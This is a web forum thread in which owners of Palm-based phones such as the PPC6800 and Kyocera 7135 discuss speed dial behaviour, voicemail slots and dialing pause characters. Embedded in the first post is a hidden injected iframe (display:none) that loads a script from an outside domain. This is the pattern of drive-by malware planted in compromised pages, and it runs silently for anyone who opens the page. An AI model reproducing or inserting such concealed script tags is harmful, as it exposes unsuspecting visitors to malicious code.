+ Reply to Thread

Speed dial

Is there no way to edit when entering a speed dial #?
    Also- everytime I enter a speed dial # that is not in my address book it adds it as an unamed entry. IS there anyway for it not to do this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

speeddail

I had not tried that until now, but i think the way speedail works is it is just for numbers already in your address book and not seperate numbers. If I remember correctly that is the same way it worked on 6035
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

It does let you add new #'s

It does let you add new #'s but it then dumps them in the address book...

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

speed dial

I agree, thats what happened to me to add and then put in address book
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Speed dial is just for quickly linking to an address book entrry. SO if you create a new one, you get a new contact.

Hi all,

Under what category are those speed-dial entries created ?
    Shimon Shnitzer
    Maker of TAKEphONE -
    "Take telephony into your Palm"

Speed Dial Position 1 - How do you direct it to your Voicemail no?

Does anyone know how/where to enter your voicemail number so it occupies position 1 in Speed Dial? When you go into Speed Dial it doesn't allow you to edit position 1 and I can't find anywhere else this can be entered.

Thanks for any help.

Go to the Messages App on the Palm side. Then hit the drop down menu. One of the selections will be Voice Mail. You will find a place to enter the voice mail number. You can use % for a hard pause and , for a 2 sec. pause if you want to program in your password, etc.

Larry

They come up in the beginning under unnamed. Also if you have any words in the phone # line (deignating husbands cell9of a couple or such) it dials the # and then all th letters

speed dial question

Without using a 3rd party product, is there a way of incorporating hard or soft pauses into a speed dial?

Yes, you can include pauses in your speed dial settings as well as voice dial.

, for soft (time pause)
    % for hard pause
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Sorry if this is a stupid question , but I read abut hard pauses, short pauses... what are the differences and when would you use one or the other...

thanks...

Tracey

:angel

The short pause will just delay the dialing 2 seconds. This is useful for dialing into voicemail for instance where you need to wait for it to answer before hitting # or something to get into your mailbox. For checking your verizon voicemail you would use the following

5559999,,#,0000

Replace 5559999 with your phone number
    Replace 0000 with your PIN.

This would dial your number, pause (I find that the ,, works better), it would dial the # and then pause and then it would dial your PIN. You could also add more pauses and put in the code to check your voicemail.

I also use it to dial the number to get my minute usage, I have it assigned to speed dial and voice dial:

#646,,92116 (replace 92116 with your billing zip code)

The more commas you put in, the longer the pause.

You would use a hard pause where you want to dial a number and then the phone waits for you to release the pause to dial an extension or something else.

Originally posted by Murgatroyd
    They come up in the beginning under unnamed. Also if you have any words in the phone # line (deignating husbands cell9of a couple or such) it dials the # and then all th letters

The numbers in speed dial (or voice dial for that matter) have to be in your contacts. If you don't want them in your normal phone book categories, create a category called JUNK or something and put them in there. Also, if you have letters in the number so you can tell what it is, put a % before the text. This is a hard pause, it will dial the number but not the text unless you hit the release pause.

On my 6035, the speed dial app had 199 slots. On my 7135, it'll only take 99. I can't remember if I had to do anything to squeeze the extra 100 out of the 6035. Are more than 99 speed dial slots possible on the 7135?
    -- Kevin Andrew Lipscomb
    -- http://kal.webhop.net

While we're on speeddialing...

Every once in a while my speed dial messed itself up. If I have a contact with more than one phone / e-mail / fax in it and I assign it a speeddial entry it works beautifullly for weeks. Until one day, I hit speeddial for that person and it's pointing to the e-mail instead of the phone number or the fax instead of the phone or the second phone number instead of the one that is originally assigned.
    Does that happen to anybody else???

Dagi